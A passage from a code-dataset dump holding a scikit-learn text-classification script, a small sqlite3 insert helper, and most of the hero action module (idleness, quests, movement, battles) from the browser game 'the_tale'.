pickle.dump(model, open(mod_file, 'wb'))\r\n\r\ndef classify_utterance(utt):\r\n    # load the vectorizer\r\n    loaded_vectorizer = pickle.load(open('D:\\\\Data\\\\Work\\\\Stage_Cergy\\\\Tests_modèles\\\\Sk_learn\\\\files\\\\vectorizer.pickle', 'rb'))\r\n    # load the tf-idf transformer\r\n    loaded_tfidf = pickle.load(open('D:\\\\Data\\\\Work\\\\Stage_Cergy\\\\Tests_modèles\\\\Sk_learn\\\\files\\\\tfidf.pickle', 'rb'))\r\n    # load the model\r\n    loaded_model = pickle.load(open('D:\\\\Data\\\\Work\\\\Stage_Cergy\\\\Tests_modèles\\\\Sk_learn\\\\files\\\\classification.joblib', 'rb'))\r\n    # make a prediction (counts -> tf-idf -> classifier, as in training)\r\n    return loaded_model.predict(loaded_tfidf.transform(loaded_vectorizer.transform([utt])))\r\n\r\n#train_model()\r\nprint(classify_utterance(\"proteger matiere planete yannickjadot\"))\r\n\r\n","repo_name":"vincent-tran-94/Stage_Cergy","sub_path":"Sk_learn/scripts/predict_thematique.py","file_name":"predict_thematique.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"43363613200","text":"import pandas as pd\nimport sqlite3\n\n\nclass DBConnection:\n    def __init__(self):\n\n        self.conn = None\n        try:\n            self.conn = sqlite3.connect('db_okved')\n        except Exception as e:\n            print(e)\n\n    def insert(self, row: tuple[str, ...]):\n        sql = '''\n        insert into main.requests_to_okved (dt_req, okved, num_outs, first_out)\n        values (?,?,?,?) 
\n '''\n cur = self.conn.cursor()\n cur.execute(sql, row)\n self.conn.commit()\n\n","repo_name":"tsoiadelina/related-company","sub_path":"src/db_connect.py","file_name":"db_connect.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11183275010","text":"# coding: utf-8\n# pylint: disable=C0302\nimport random\nimport copy\nimport math\n\nfrom django.conf import settings as project_settings\n\nfrom dext.common.utils.urls import url\nfrom dext.common.utils import discovering\n\nfrom the_tale.common.utils import logic as utils_logic\n\nfrom the_tale.game.prototypes import TimePrototype\n\nfrom the_tale.game.heroes.relations import MONEY_SOURCE\n\nfrom the_tale.game.balance import constants as c, formulas as f, enums as e\n\nfrom the_tale.game.quests import logic as quests_logic\n\nfrom the_tale.game.mobs.prototypes import MobPrototype\nfrom the_tale.game.mobs.storage import mobs_storage\n\nfrom the_tale.game.artifacts.storage import artifacts_storage\n\nfrom the_tale.game.map.roads.storage import waymarks_storage\nfrom the_tale.game.map.places.storage import places_storage\nfrom the_tale.game.map.storage import map_info_storage\n\nfrom the_tale.game.abilities.relations import HELP_CHOICES\n\nfrom the_tale.game.actions import battle\nfrom the_tale.game.actions import contexts\nfrom the_tale.game.actions import exceptions\nfrom the_tale.game.actions import relations\nfrom the_tale.game.actions import meta_actions\n\n\nE = 0.0001\n\n\nclass ActionBase(object):\n\n __slots__ = ( 'hero',\n 'percents',\n 'bundle_id',\n 'description',\n 'state',\n 'removed',\n 'storage',\n 'created_at_turn',\n 'context',\n 'place_id',\n 'mob',\n 'data',\n 'break_at',\n 'length',\n 'destination_x',\n 'destination_y',\n 'percents_barier',\n 'extra_probability',\n 'mob_context',\n 'textgen_id',\n 'back',\n 'info_link',\n 'meta_action_id',\n 'replane_required')\n\n\n class STATE:\n UNINITIALIZED = 'uninitialized'\n PROCESSED = 'processed'\n\n TYPE = None\n SINGLE = True # is action work with only one hero\n TEXTGEN_TYPE = None\n CONTEXT_MANAGER = None\n HELP_CHOICES = set()\n APPROVED_FOR_STEPS_CHAIN = True\n HABIT_MODE = relations.ACTION_HABIT_MODE.PEACEFUL\n\n def __init__(self,\n hero,\n bundle_id,\n state,\n percents=0.0,\n type=None, # just for deserialization\n created_at_turn=None,\n context=None,\n description=None,\n place_id=None,\n mob=None,\n data=None,\n break_at=None,\n length=None,\n destination_x=None,\n destination_y=None,\n percents_barier=None,\n extra_probability=None,\n mob_context=None,\n textgen_id=None,\n back=False,\n info_link=None,\n meta_action_id=None,\n replane_required=False):\n\n self.updated = False\n\n self.hero = hero\n\n self.description = description\n\n self.percents = percents\n\n self.bundle_id = bundle_id\n\n self.state = state\n\n self.removed = False\n self.storage = None\n\n self.created_at_turn = created_at_turn if created_at_turn is not None else TimePrototype.get_current_turn_number()\n\n self.context = None\n self.mob_context = None\n\n if self.CONTEXT_MANAGER:\n self.context = context if context is None or isinstance(context, self.CONTEXT_MANAGER) else self.CONTEXT_MANAGER.deserialize(context)\n self.mob_context = mob_context if mob_context is None or isinstance(mob_context, self.CONTEXT_MANAGER) else self.CONTEXT_MANAGER.deserialize(mob_context)\n\n self.place_id = place_id\n\n self.mob = None\n if mob:\n self.mob = mob if isinstance(mob, MobPrototype) else 
MobPrototype.deserialize(mob)\n\n self.data = data\n self.break_at = break_at\n self.length = length\n self.destination_x = destination_x\n self.destination_y = destination_y\n self.percents_barier = percents_barier\n self.extra_probability = extra_probability\n self.textgen_id = textgen_id\n self.back = back\n self.meta_action_id = meta_action_id\n\n self.info_link = info_link\n\n self.replane_required = replane_required\n\n\n def serialize(self):\n data = {'type': self.TYPE.value,\n 'bundle_id': self.bundle_id,\n 'state': self.state,\n 'percents': self.percents,\n 'description': self.description,\n 'created_at_turn': self.created_at_turn}\n if self.replane_required:\n data['replane_required'] = self.replane_required\n if self.context:\n data['context'] = self.context.serialize()\n if self.place_id is not None:\n data['place_id'] = self.place_id\n if self.mob:\n data['mob'] = self.mob.serialize()\n if self.data:\n data['data'] = self.data\n if self.break_at is not None:\n data['break_at'] = self.break_at\n if self.length is not None:\n data['length'] = self.length\n if self.destination_x is not None:\n data['destination_x'] = self.destination_x\n if self.destination_y is not None:\n data['destination_y'] = self.destination_y\n if self.percents_barier is not None:\n data['percents_barier'] = self.percents_barier\n if self.extra_probability is not None:\n data['extra_probability'] = self.extra_probability\n if self.mob_context:\n data['mob_context'] = self.mob_context.serialize()\n if self.textgen_id is not None:\n data['textgen_id'] = self.textgen_id\n if self.back:\n data['back'] = self.back\n if self.meta_action_id is not None:\n data['meta_action_id'] = self.meta_action_id\n if self.info_link is not None:\n data['info_link'] = self.info_link\n\n return data\n\n @classmethod\n def deserialize(cls, hero, data):\n return cls(hero=hero, **data)\n\n @property\n def ui_type(self): return self.TYPE\n\n def ui_info(self):\n if self.description is None:\n self.description = self.get_description()\n\n if self.info_link is None:\n self.info_link = self.get_info_link()\n\n return {'percents': max(0.0, min(1.0, self.percents)),\n 'type': self.ui_type.value,\n 'description': self.description,\n 'info_link': self.info_link,\n 'is_boss': self.mob.is_boss if self.mob else None}\n\n @property\n def leader(self):\n return (not self.removed) and (self.hero.actions.current_action is self)\n\n def set_storage(self, storage):\n self.storage = storage\n\n @property\n def place(self): return places_storage[self.place_id]\n\n def get_destination(self): return self.destination_x, self.destination_y\n def set_destination(self, x, y):\n self.destination_x = x\n self.destination_y = y\n\n @property\n def meta_action(self):\n if self.storage is None: # if meta_action accessed from views (not from logic)\n return meta_actions.get_meta_action_by_id(self.meta_action_id) if self.meta_action_id is not None else None\n return self.storage.meta_actions.get(self.meta_action_id) if self.meta_action_id is not None else None\n\n @property\n def help_choices(self):\n choices = copy.copy(self.HELP_CHOICES)\n\n if HELP_CHOICES.HEAL in choices:\n if len(choices) > 1 and not self.hero.can_be_healed(strict=False):\n choices.remove(HELP_CHOICES.HEAL)\n elif not self.hero.can_be_healed(strict=True):\n choices.remove(HELP_CHOICES.HEAL)\n\n if HELP_CHOICES.HEAL_COMPANION in choices:\n if (self.hero.companion is None or\n self.hero.companion_heal_disabled() or\n self.hero.companion.health == self.hero.companion.max_health):\n 
choices.remove(HELP_CHOICES.HEAL_COMPANION)\n\n        if HELP_CHOICES.STOCK_UP_ENERGY in choices:\n            if self.hero.energy_bonus >= c.ANGEL_FREE_ENERGY_MAXIMUM:\n                choices.remove(HELP_CHOICES.STOCK_UP_ENERGY)\n\n        return choices\n\n    def get_help_choice(self):\n\n        choices = [(choice, choice.priority) for choice in self.help_choices]\n\n        return utils_logic.random_value_by_priority(choices)\n\n    @property\n    def description_text_name(self):\n        return '%s_description' % self.TEXTGEN_TYPE\n\n    def get_info_link(self):\n        return None\n\n    def get_description(self):\n        from the_tale.linguistics import logic as linguistics_logic\n        return linguistics_logic.get_text(self.description_text_name, self.get_description_arguments())\n\n    def get_description_arguments(self):\n        return {'hero': self.hero}\n\n    def on_heal(self):\n        pass\n\n    def on_heal_companion(self):\n        pass\n\n    #####################################\n    # management\n    #####################################\n    @classmethod\n    def create(cls, hero, **kwargs):\n        '''\n        the _storage argument is used only during the hero creation step\n        '''\n\n        bundle_id = None\n\n        if hero.actions.has_actions:\n            bundle_id = hero.actions.current_action.bundle_id\n\n            # change the description of the current action:\n            # when the new action ends, it will look as if the hero performed another new action instead of the old one\n            hero.actions.current_action.description = hero.actions.current_action.get_description()\n\n        _storage = None\n        if '_storage' in kwargs:\n            _storage = kwargs['_storage']\n            del kwargs['_storage']\n\n        if '_bundle_id' in kwargs:\n            bundle_id = kwargs['_bundle_id']\n            del kwargs['_bundle_id']\n\n        action = cls._create(hero, bundle_id, **kwargs)\n\n        if _storage:\n            _storage.add_action(action)\n\n        elif hero.actions.has_actions:\n            hero.actions.current_action.storage.add_action(action)\n\n        hero.actions.push_action(action)\n\n        return action\n\n    def on_remove(self):\n        pass\n\n    def remove(self, force=False):\n        '''\n        force - if True, storages will be ignored (needed for a full removal of angel & hero)\n        '''\n\n        self.on_remove()\n\n        if self.storage:\n            self.storage.remove_action(self)\n\n        self.hero.actions.pop_action()\n\n        self.removed = True\n\n    def on_save(self):\n        if self.meta_action_id is not None and self.meta_action.updated:\n            self.meta_action.save()\n\n    def process_action(self):\n        self.hero.actions.updated = True\n\n        self.process()\n\n        # remove only the leader action\n        # an action can set the PROCESSED state and create a child action;\n        # in that case we should not remove the action here:\n        # it will be removed (by processing of chain actions in LogicStorage) when the child action is processed\n        if self.leader and not self.removed and self.state == self.STATE.PROCESSED:\n            self.remove()\n\n\n    def process_turn(self):\n        self.process_action()\n\n    def choose_event_reward(self):\n        return utils_logic.random_value_by_priority([(record, record.priority) for record in relations.ACTION_EVENT_REWARD.records])\n\n    def do_events(self):\n\n        habit_events = self.hero.habit_events()\n\n        if not habit_events:\n            return\n\n        event = random.choice(list(habit_events))\n\n        event_reward = self.choose_event_reward()\n\n        message_type = 'action_event_habit_%s_%s_%s' % (self.TYPE.name.lower(), event.name.lower(), event_reward.name.lower())\n\n        if event_reward.is_NOTHING:\n            self.hero.add_message(message_type, diary=True, hero=self.hero, **self.action_event_message_arguments())\n        elif event_reward.is_MONEY:\n            coins = int(math.ceil(f.normal_loot_cost_at_lvl(self.hero.level)))\n            self.hero.change_money(MONEY_SOURCE.EARNED_FROM_HABITS, coins)\n            self.hero.add_message(message_type, 
diary=True, hero=self.hero, coins=coins, **self.action_event_message_arguments())\n        elif event_reward.is_ARTIFACT:\n            artifact, unequipped, sell_price = self.hero.receive_artifact(equip=False, better=False, prefered_slot=False, prefered_item=False, archetype=False)\n            self.hero.add_message(message_type, diary=True, hero=self.hero, artifact=artifact, **self.action_event_message_arguments())\n        elif event_reward.is_EXPERIENCE:\n            experience = self.hero.add_experience(int(c.HABIT_EVENT_EXPERIENCE * random.uniform(1.0-c.HABIT_EVENT_EXPERIENCE_DELTA, 1.0+c.HABIT_EVENT_EXPERIENCE_DELTA)))\n            self.hero.add_message(message_type, diary=True, hero=self.hero, experience=experience, **self.action_event_message_arguments())\n\n    def action_event_message_arguments(self):\n        return {}\n\n    searching_quest = False\n\n    def setup_quest(self, quest):\n        pass # do nothing if there is no quest action\n\n\n    def __eq__(self, other):\n\n        return (self.removed == other.removed and\n                self.TYPE == other.TYPE and\n                self.percents == other.percents and\n                self.state == other.state and\n                self.hero.id == other.hero.id and\n                self.context == other.context and\n                self.mob_context == other.mob_context and\n                self.place_id == other.place_id and\n                self.mob == other.mob and\n                self.data == other.data and\n                self.break_at == other.break_at and\n                self.length == other.length and\n                self.destination_x == other.destination_x and\n                self.destination_y == other.destination_y and\n                self.percents_barier == other.percents_barier and\n                self.extra_probability == other.extra_probability and\n                self.textgen_id == other.textgen_id)
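\n\n# Both get_help_choice and choose_event_reward above delegate to\n# utils_logic.random_value_by_priority, whose implementation is not part of this\n# file; presumably it performs a priority-weighted random pick, roughly like\n# this sketch (illustrative only, not the project's actual helper):\n#\n#     def random_value_by_priority(choices):\n#         total = sum(priority for _, priority in choices)\n#         roll = random.uniform(0, total)\n#         for value, priority in choices:\n#             roll -= priority\n#             if roll <= 0:\n#                 return value\n#         return choices[-1][0]  # guard against floating-point leftovers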
\n\n\n\nclass ActionIdlenessPrototype(ActionBase):\n\n    TYPE = relations.ACTION_TYPE.IDLENESS\n    TEXTGEN_TYPE = 'action_idleness'\n\n    @property\n    def HELP_CHOICES(self): # pylint: disable=C0103\n        choices = set((HELP_CHOICES.START_QUEST, HELP_CHOICES.HEAL, HELP_CHOICES.MONEY, HELP_CHOICES.EXPERIENCE, HELP_CHOICES.STOCK_UP_ENERGY, HELP_CHOICES.HEAL_COMPANION))\n\n        if self.percents > 1.0 - E:\n            choices.remove(HELP_CHOICES.START_QUEST)\n\n        return choices\n\n    class STATE(ActionBase.STATE):\n        QUEST = 'QUEST'\n        IN_PLACE = 'IN_PLACE'\n        WAITING = 'WAITING'\n        REGENERATE_ENERGY = 'regenerate_energy'\n        RETURN = 'RETURN'\n        RESURRECT = 'RESURRECT'\n\n    ###########################################\n    # Object operations\n    ###########################################\n\n    @classmethod\n    def _create(cls, hero=None, bundle_id=None):\n        if hero.actions.has_actions:\n            return cls( hero=hero,\n                        bundle_id=bundle_id,\n                        state=cls.STATE.WAITING)\n        else:\n            return cls(hero=hero,\n                       bundle_id=bundle_id,\n                       percents=1.0,\n                       state=cls.STATE.WAITING)\n\n    def init_quest(self):\n\n        if not self.leader:\n            return False\n\n        self.state = self.STATE.WAITING\n\n        self.percents = 1.0\n        self.hero.actions.current_action.percents = self.percents\n\n        self.updated = True\n\n        return True\n\n    def preprocess(self):\n        if not self.hero.is_alive:\n            ActionResurrectPrototype.create(hero=self.hero)\n            self.state = self.STATE.RESURRECT\n            return True\n\n        return False\n\n    def process_position(self):\n        if self.hero.position.place is None:\n            if self.hero.position.road:\n                # choose the nearest place on the road\n                if bool(self.hero.position.percents < 0.5) != self.hero.position.invert_direction:\n                    destination = self.hero.position.road.point_1\n                else:\n                    destination = self.hero.position.road.point_2\n\n                ActionMoveToPrototype.create(hero=self.hero, destination=destination)\n            else:\n                destination = self.hero.position.get_nearest_dominant_place()\n                ActionMoveNearPlacePrototype.create(hero=self.hero, place=destination, back=True)\n\n                self.state = self.STATE.RETURN\n        else:\n            self.state = self.STATE.IN_PLACE\n            ActionInPlacePrototype.create(hero=self.hero)\n\n        return self.state in (self.STATE.IN_PLACE, self.STATE.RETURN)\n\n    def process(self):\n\n        if self.preprocess():\n            return\n\n        if self.state == self.STATE.RESURRECT:\n            if self.process_position():\n                return\n            self.state = self.STATE.WAITING\n\n        if self.state == self.STATE.RETURN:\n            self.state = self.STATE.WAITING\n\n        if self.state == self.STATE.IN_PLACE:\n            self.state = self.STATE.WAITING\n\n        if self.state == self.STATE.REGENERATE_ENERGY:\n            self.state = self.STATE.WAITING\n\n        if self.state == self.STATE.QUEST:\n            self.percents = 0 # reset percents only on quest's ending\n            if self.process_position():\n                return\n            self.state = self.STATE.WAITING\n\n        if self.state == self.STATE.WAITING:\n\n            if self.hero.position.place is None:\n                self.process_position()\n                return\n\n            self.percents += 1.0 / self.hero.idle_length\n\n            if self.percents >= 1.0:\n                self.state = self.STATE.QUEST\n                ActionQuestPrototype.create(hero=self.hero)\n\n            elif self.hero.need_regenerate_energy and self.hero.preferences.energy_regeneration_type != e.ANGEL_ENERGY_REGENERATION_TYPES.SACRIFICE:\n                ActionRegenerateEnergyPrototype.create(hero=self.hero)\n                self.state = self.STATE.REGENERATE_ENERGY\n\n            else:\n                if random.uniform(0, 1) < 1.0 / c.TURNS_TO_IDLE / 2: # one phrase per two hero levels\n                    self.hero.add_message('action_idleness_waiting', hero=self.hero)\n\n\nclass ActionQuestPrototype(ActionBase):\n\n    TYPE = relations.ACTION_TYPE.QUEST\n    TEXTGEN_TYPE = 'action_quest'\n    HELP_CHOICES = set((HELP_CHOICES.HEAL, HELP_CHOICES.MONEY, HELP_CHOICES.EXPERIENCE, HELP_CHOICES.STOCK_UP_ENERGY, HELP_CHOICES.HEAL_COMPANION))\n    APPROVED_FOR_STEPS_CHAIN = False # all quest actions MUST be done on separate turns\n\n    class STATE(ActionBase.STATE):\n        SEARCHING = 'searching'\n        PROCESSING = 'processing'\n        EQUIPPING = 'equipping'\n\n    ###########################################\n    # Object operations\n    ###########################################\n\n    @classmethod\n    def _create(cls, hero, bundle_id):\n        return cls(hero=hero,\n                   bundle_id=bundle_id,\n                   state=cls.STATE.SEARCHING)\n\n    @property\n    def searching_quest(self):\n        return self.state == self.STATE.SEARCHING\n\n    def setup_quest(self, quest):\n        if self.state != self.STATE.SEARCHING:\n            return\n\n        self.hero.quests.push_quest(quest)\n\n        self.state = self.STATE.PROCESSING\n\n\n    def process(self):\n\n        if self.state == self.STATE.SEARCHING:\n            if self.hero.quests.has_quests:\n                self.state = self.STATE.PROCESSING\n            else:\n                # a lot of tests depend on complete processing of this action,\n                # so it is easier to emulate quest generation here than to place mock objects everywhere\n                if project_settings.TESTS_RUNNING:\n                    from the_tale.game.quests.tests import helpers as quests_helpers\n                    quests_helpers.setup_quest(self.hero)\n                else:\n                    quests_logic.request_quest_for_hero(self.hero)\n\n        if self.state == self.STATE.EQUIPPING:\n            self.state = self.STATE.PROCESSING\n\n        if self.state == self.STATE.PROCESSING:\n\n            if not self.hero.quests.has_quests:\n                self.state = self.STATE.PROCESSED\n                return\n\n            if self.hero.need_equipping:\n                self.state = self.STATE.EQUIPPING\n                ActionEquippingPrototype.create(hero=self.hero)\n\n            percents = self.hero.quests.current_quest.process()\n\n            self.percents = percents\n\n            if self.hero.quests.current_quest.is_processed:\n                self.hero.quests.pop_quest()\n                self.state = self.STATE.PROCESSED\n\n\nclass ActionMoveToPrototype(ActionBase):\n\n    TYPE = relations.ACTION_TYPE.MOVE_TO\n    TEXTGEN_TYPE = 
'action_moveto'\n\n @property\n def HELP_CHOICES(self):\n choices = set((HELP_CHOICES.HEAL, HELP_CHOICES.MONEY, HELP_CHOICES.EXPERIENCE, HELP_CHOICES.STOCK_UP_ENERGY, HELP_CHOICES.HEAL_COMPANION))\n\n if self.state == self.STATE.MOVING:\n choices.add(HELP_CHOICES.TELEPORT)\n\n return choices\n\n\n class STATE(ActionBase.STATE):\n CHOOSE_ROAD = 'choose_road'\n MOVING = 'moving'\n IN_CITY = 'in_city'\n BATTLE = 'battle'\n REGENERATE_ENERGY = 'regenerate_energy'\n RESTING = 'resting'\n RESURRECT = 'resurrect'\n HEALING_COMPANION = 'healing_companion'\n\n @property\n def destination_id(self): return self.place_id\n\n @property\n def destination(self): return self.place\n\n ###########################################\n # Object operations\n ###########################################\n\n\n @classmethod\n def _create(cls, hero, bundle_id, destination, break_at=None):\n prototype = cls(hero=hero,\n bundle_id=bundle_id,\n place_id=destination.id,\n break_at=break_at,\n state=cls.STATE.CHOOSE_ROAD)\n hero.add_message('action_moveto_start', hero=hero, destination=destination)\n return prototype\n\n def get_description_arguments(self):\n args = super(ActionMoveToPrototype, self).get_description_arguments()\n args.update({'destination': self.place})\n return args\n\n def teleport(self, distance, create_inplace_action):\n\n if self.state != self.STATE.MOVING:\n return False\n\n stop_percents = self.break_at if self.break_at else 1\n\n max_road_distance = self.hero.position.road.length * (1 - self.hero.position.percents)\n max_action_distance = self.length * (stop_percents - self.percents )\n\n distance = min(distance, min(max_road_distance, max_action_distance))\n\n self.hero.position.percents += distance / self.hero.position.road.length\n\n if self.length > E:\n self.percents += distance / self.length\n\n if self.hero.position.percents + E > 1:\n self.hero.position.percents = 1\n self.place_hero_in_current_destination(create_action=create_inplace_action)\n\n if self.percents + E > stop_percents:\n self.state = self.STATE.PROCESSED\n\n self.updated = True\n\n return True\n\n def teleport_to_place(self, create_inplace_action):\n\n if self.state != self.STATE.MOVING:\n return False\n\n return self.teleport(distance=self.hero.position.road.length+1, create_inplace_action=create_inplace_action)\n\n def teleport_to_end(self):\n if self.state != self.STATE.MOVING:\n return False\n\n while True:\n if not self.teleport_to_place(create_inplace_action=False):\n return False\n\n if self.state == self.STATE.PROCESSED:\n if self.hero.position.place:\n ActionInPlacePrototype.create(hero=self.hero)\n return True\n\n self.process_choose_road()\n\n @property\n def current_destination(self): return self.hero.position.road.point_2 if not self.hero.position.invert_direction else self.hero.position.road.point_1\n\n def preprocess(self):\n if self.replane_required:\n self.state = self.STATE.PROCESSED\n return True\n\n if not self.hero.is_alive:\n ActionResurrectPrototype.create(hero=self.hero)\n self.state = self.STATE.RESURRECT\n return True\n\n if self.hero.need_rest_in_move:\n ActionRestPrototype.create(hero=self.hero)\n self.state = self.STATE.RESTING\n return True\n\n if self.hero.companion_need_heal():\n ActionHealCompanionPrototype.create(hero=self.hero)\n self.state = self.STATE.HEALING_COMPANION\n return True\n\n return False\n\n def process_choose_road__in_place(self):\n if self.hero.position.place_id != self.destination_id:\n waymark = waymarks_storage.look_for_road(point_from=self.hero.position.place_id, 
point_to=self.destination_id)\n            length = waymark.length\n            self.hero.position.set_road(waymark.road, invert=(self.hero.position.place_id != waymark.road.point_1_id))\n            self.state = self.STATE.MOVING\n        else:\n            length = None\n            self.state = self.STATE.PROCESSED\n\n        return length\n\n    def process_choose_road__in_road(self):\n        waymark = waymarks_storage.look_for_road(point_from=self.hero.position.road.point_1_id, point_to=self.destination_id)\n        road_left = waymark.road\n        length_left = waymark.length\n\n        waymark = waymarks_storage.look_for_road(point_from=self.hero.position.road.point_2_id, point_to=self.destination_id)\n        road_right = waymark.road\n        length_right = waymark.length\n\n        if not self.hero.position.invert_direction:\n            delta_left = self.hero.position.percents * self.hero.position.road.length\n        else:\n            delta_left = (1 - self.hero.position.percents) * self.hero.position.road.length\n        delta_right = self.hero.position.road.length - delta_left\n\n        if road_left is None:\n            invert = True\n        elif road_right is None:\n            invert = False\n        else:\n            invert = (length_left + delta_left) < (delta_right + length_right)\n\n        if invert:\n            length = length_left + delta_left\n        else:\n            length = length_right + delta_right\n\n        percents = self.hero.position.percents\n        if self.hero.position.invert_direction and not invert:\n            percents = 1 - percents\n        elif not self.hero.position.invert_direction and invert:\n            percents = 1 - percents\n\n        if length < 0.01:\n            self.place_hero_in_current_destination()\n        else:\n            self.hero.position.set_road(self.hero.position.road, invert=invert, percents=percents)\n            self.state = self.STATE.MOVING\n\n        return length\n\n\n    def process_choose_road(self):\n        if self.hero.position.place_id:\n            length = self.process_choose_road__in_place()\n        else:\n            length = self.process_choose_road__in_road()\n\n        if self.length is None:\n            self.length = length\n\n        if self.hero.companion and self.state == self.STATE.MOVING and random.random() < self.hero.companion_teleport_probability:\n            self.hero.add_message('companions_teleport', companion_owner=self.hero, companion=self.hero.companion, destination=self.current_destination)\n            self.teleport_to_place(create_inplace_action=True)\n            return\n\n    def normal_move(self):\n\n        if self.hero.companion and self.hero.can_companion_say_wisdom() and random.random() < self.hero.companion_say_wisdom_probability:\n            self.hero.add_experience(c.COMPANIONS_EXP_PER_MOVE_GET_EXP, without_modifications=True)\n            self.hero.add_message('companions_say_wisdom', companion_owner=self.hero, companion=self.hero.companion, experience=c.COMPANIONS_EXP_PER_MOVE_GET_EXP)\n\n        elif random.uniform(0, 1) < c.HABIT_MOVE_EVENTS_IN_TURN:\n            self.do_events()\n\n        elif random.uniform(0, 1) < 0.33:\n            if self.destination.id != self.current_destination.id and random.uniform(0, 1) < 0.04: # TODO: change probability, when there are move phrases\n                self.hero.add_message('action_moveto_move_long_path',\n                                      hero=self.hero,\n                                      destination=self.destination,\n                                      current_destination=self.current_destination)\n            else:\n                self.hero.add_message('action_moveto_move',\n                                      hero=self.hero,\n                                      destination=self.destination,\n                                      current_destination=self.current_destination)\n\n        if self.hero.companion and random.random() < self.hero.companion_fly_probability:\n            self.hero.add_message('companions_fly', companion_owner=self.hero, companion=self.hero.companion)\n            self.teleport(c.ANGEL_HELP_TELEPORT_DISTANCE, create_inplace_action=True)\n            return\n\n        move_speed = self.hero.position.modify_move_speed(self.hero.move_speed)\n\n        delta = move_speed / self.hero.position.road.length
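\n        # delta is the fraction of the current road covered this turn: e.g. a\n        # modified move_speed of 0.3 on a road of length 6 advances the hero by 5%\n        # of the road, while self.percents below tracks progress against the\n        # whole planned path (self.length).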
\n\n        self.hero.position.percents += delta\n\n        if self.length > 0.001:\n            self.percents += move_speed / self.length\n        else:\n            self.percents = 1\n\n    def picked_up_in_road(self):\n        current_destination = self.current_destination # save the destination before the teleport, since it can be reset after we perform it\n\n        if self.teleport(c.PICKED_UP_IN_ROAD_TELEPORT_LENGTH, create_inplace_action=True):\n\n            self.hero.add_message('action_moveto_picked_up_in_road',\n                                  hero=self.hero,\n                                  destination=self.destination,\n                                  current_destination=current_destination)\n\n\n\n    def process_moving(self):\n\n        if self.hero.need_regenerate_energy and self.hero.preferences.energy_regeneration_type != e.ANGEL_ENERGY_REGENERATION_TYPES.SACRIFICE:\n            ActionRegenerateEnergyPrototype.create(hero=self.hero)\n            self.state = self.STATE.REGENERATE_ENERGY\n\n        elif self.hero.position.is_battle_start_needed():\n            mob = mobs_storage.create_mob_for_hero(self.hero)\n            ActionBattlePvE1x1Prototype.create(hero=self.hero, mob=mob)\n            self.state = self.STATE.BATTLE\n\n        else:\n            if self.hero.can_picked_up_in_road():\n                self.picked_up_in_road()\n            else:\n                self.normal_move()\n\n            if self.hero.position.percents >= 1:\n                self.place_hero_in_current_destination()\n\n            elif self.percents >= 1:\n                self.state = self.STATE.PROCESSED\n\n            elif self.break_at is not None and self.break_at < self.percents:\n                self.state = self.STATE.PROCESSED\n\n    def place_hero_in_current_destination(self, create_action=True):\n        self.hero.position.percents = 1\n        self.hero.position.set_place(self.current_destination)\n        self.state = self.STATE.IN_CITY\n        if create_action:\n            ActionInPlacePrototype.create(hero=self.hero)\n\n    def process(self):\n\n        if self.preprocess():\n            return\n\n        if self.state in (self.STATE.RESTING, self.STATE.RESURRECT, self.STATE.REGENERATE_ENERGY, self.STATE.IN_CITY, self.STATE.HEALING_COMPANION):\n            self.state = self.STATE.CHOOSE_ROAD\n\n        if self.state == self.STATE.BATTLE:\n            if not self.hero.is_alive:\n                ActionResurrectPrototype.create(hero=self.hero)\n                self.state = self.STATE.RESURRECT\n            else:\n                if self.hero.need_rest_in_move:\n                    ActionRestPrototype.create(hero=self.hero)\n                    self.state = self.STATE.RESTING\n                elif self.hero.need_regenerate_energy:\n                    ActionRegenerateEnergyPrototype.create(hero=self.hero)\n                    self.state = self.STATE.REGENERATE_ENERGY\n                elif self.hero.companion_need_heal():\n                    ActionHealCompanionPrototype.create(hero=self.hero)\n                    self.state = self.STATE.HEALING_COMPANION\n                else:\n                    self.state = self.STATE.MOVING\n\n        if self.state == self.STATE.CHOOSE_ROAD:\n            self.process_choose_road()\n\n        if self.state == self.STATE.MOVING:\n            self.process_moving()\n\n\nclass ActionBattlePvE1x1Prototype(ActionBase):\n\n    TYPE = relations.ACTION_TYPE.BATTLE_PVE_1X1\n    TEXTGEN_TYPE = 'action_battlepve1x1'\n    CONTEXT_MANAGER = contexts.BattleContext\n    HABIT_MODE = relations.ACTION_HABIT_MODE.AGGRESSIVE\n\n    @property\n    def HELP_CHOICES(self): # pylint: disable=C0103\n        if not self.hero.is_alive:\n            return set((HELP_CHOICES.RESURRECT,))\n        if self.mob.health <= 0:\n            return set((HELP_CHOICES.HEAL, HELP_CHOICES.MONEY, HELP_CHOICES.EXPERIENCE, HELP_CHOICES.STOCK_UP_ENERGY, HELP_CHOICES.HEAL_COMPANION))\n        return set((HELP_CHOICES.LIGHTING, HELP_CHOICES.HEAL, HELP_CHOICES.MONEY, HELP_CHOICES.EXPERIENCE, HELP_CHOICES.STOCK_UP_ENERGY, HELP_CHOICES.HEAL_COMPANION))\n\n    class STATE(ActionBase.STATE):\n        BATTLE_RUNNING = 'battle_running'\n\n    ###########################################\n    # Object operations\n    ###########################################\n\n    def 
get_info_link(self):\n return url('guide:mobs:info', self.mob.record.id)\n\n @classmethod\n def _create(cls, hero, bundle_id, mob):\n\n kill_before_battle = hero.can_kill_before_battle()\n can_peacefull_battle = hero.can_peacefull_battle(mob.mob_type)\n can_leave_battle_in_fear = hero.can_leave_battle_in_fear()\n companions_is_exorcist = hero.companion and hero.can_companion_do_exorcism() and random.random() < hero.companion_do_exorcism_probability\n\n instant_kill_mob = False\n\n if kill_before_battle:\n percents = 1.0\n state = cls.STATE.PROCESSED\n hero.add_message('action_battlepve1x1_kill_before_start', hero=hero, mob=mob)\n instant_kill_mob = True\n elif can_peacefull_battle:\n percents = 1.0\n state = cls.STATE.PROCESSED\n hero.add_message('action_battlepve1x1_peacefull_battle', hero=hero, mob=mob)\n elif can_leave_battle_in_fear:\n percents = 1.0\n state = cls.STATE.PROCESSED\n hero.add_message('action_battlepve1x1_leave_battle_in_fear', hero=hero, mob=mob)\n elif companions_is_exorcist and mob.mob_type.is_DEMON:\n percents = 1.0\n state = cls.STATE.PROCESSED\n hero.add_message('action_battlepve1x1_companion_do_exorcims', hero=hero, mob=mob, companion=hero.companion)\n instant_kill_mob = True\n else:\n percents = 0.0\n state = cls.STATE.BATTLE_RUNNING\n hero.add_message('action_battlepve1x1_start', hero=hero, mob=mob)\n\n prototype = cls( hero=hero,\n bundle_id=bundle_id,\n 